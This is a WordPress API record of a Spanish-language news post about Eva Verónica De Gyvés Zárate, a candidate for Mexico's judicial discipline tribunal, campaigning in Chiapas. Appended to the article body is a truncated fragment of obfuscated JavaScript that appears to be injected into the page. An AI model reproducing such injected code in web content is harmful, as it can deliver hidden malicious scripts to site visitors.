{"id":21854,"date":"2025-05-13T00:45:28","date_gmt":"2025-05-13T00:45:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21854"},"modified":"2025-05-13T00:45:29","modified_gmt":"2025-05-13T00:45:29","slug":"es-necesario-vigilar-el-desempeno-de-jueces-y-magistrados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21854","title":{"rendered":"Es necesario vigilar el desempe\u00f1o de jueces y magistrados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-1024x682.jpg\" alt=\"\" class=\"wp-image-21855\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250512-WA0042.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez<\/p>\n\n\n\n<p>12 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes, Eva Ver\u00f3nica De Gyv\u00e9s Z\u00e1rate, aspirante a magistrada del Tribunal de Disciplina Judicial lleva a cabo una gira de trabajo por el estado para promover el voto el 1 de Junio.<\/p>\n\n\n\n<p>Las aspirante, es consejera de la Judicatura Federal, es originaria de Ixtepec Oaxaca y caminar\u00e1 o parques, mercados en la capital chiapaneca y en Chiapa de Corzo.<\/p>\n\n\n\n<p>\u201cAcercarme a la gente porque esa es la finalidad que tiene esta reforma de que nosotros estemos m\u00e1s cerca de la ciudadan\u00eda, m\u00e1s cerca del pueblo de M\u00e9xico, para que sintamos, qu\u00e9 requieren, qu\u00e9 necesitan y qu\u00e9 es y que no seamos tan soberbios, que le bajemos tres rayitas a lo que somos para para tratar mejor a la ciudadan\u00eda\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Desde su parecer el tiempo de dos meses de campa\u00f1a es muy poco tiempo para recorrer todo el pa\u00eds por ello redobla esfuerzos para llegar a todos los sectores y sepan la importancia de la votaci\u00f3n del 1 de junio la cual es hist\u00f3rica para el pa\u00eds.<\/p>\n\n\n\n<p>El punto medular de sus propuesta es que \u201cnosotros tenemos que sensibilizar a los juzgadores para acortar la distancia que hay entre los juzgadores y la ciudadan\u00eda. Ese es el primer punto que yo creo que nosotros tenemos que trabajar\u201d.<\/p>\n\n\n\n<p>Otro aspecto preponderante es el tiempo de soluci\u00f3n del trabajo que \u201cel cual no sale en los tiempos estimados, es otro punto que nosotros vamos a revisar para efectos de que no exista atrasos y si eso ocurre ver los motivos trabajando siempre a consciencia\u201d.<\/p>\n\n\n\n<p>Mientras que el tercer punto es sancionar a los jueces, magistrados hasta los ministros en caso de que cometan una falta que lo amerite.<\/p>\n\n\n\n<p>En este escenario expuso que, requiere gran atenci\u00f3n el desempe\u00f1o de jueces y magistrados sin caer en una condici\u00f3n inquisidora.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez 12 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes, Eva Ver\u00f3nica De Gyv\u00e9s Z\u00e1rate, aspirante a magistrada del Tribunal de Disciplina Judicial lleva a cabo una gira de trabajo por el estado para promover el voto el 1 de Junio. Las aspirante, es consejera de la Judicatura Federal, es originaria de Ixtepec Oaxaca &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21855,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21854","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21854","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21854"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21854\/revisions"}],"predecessor-version":[{"id":21856,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21854\/revisions\/21856"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21855"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21854"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21854"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21854"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}